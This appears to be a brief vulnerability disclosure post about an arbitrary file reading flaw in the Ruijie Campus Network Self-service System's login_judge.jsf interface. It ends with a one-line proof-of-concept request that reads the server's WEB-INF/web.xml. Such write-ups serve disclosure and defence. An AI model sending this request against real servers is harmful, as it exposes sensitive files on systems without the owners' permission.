Ruijie Campus Network Self Service System Login_judge Jsf Arbitrary File Reading Vulnerability
Ruijie Campus Network Self Service System Login_judge Jsf Arbitrary File Reading Vulnerability
Ruijie Campus Network Self-service System login_judge.jsf Arbitrary file reading vulnerability
Vulnerability Description
Ruijie Campus Network Self-service System login_judge.jsf interface has arbitrary file reading vulnerability, and attackers can obtain sensitive files in the server through the vulnerability.
Vulnerability Impact
Rujie Campus Network Self-service System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F
This post is licensed under CC BY 4.0 by the author.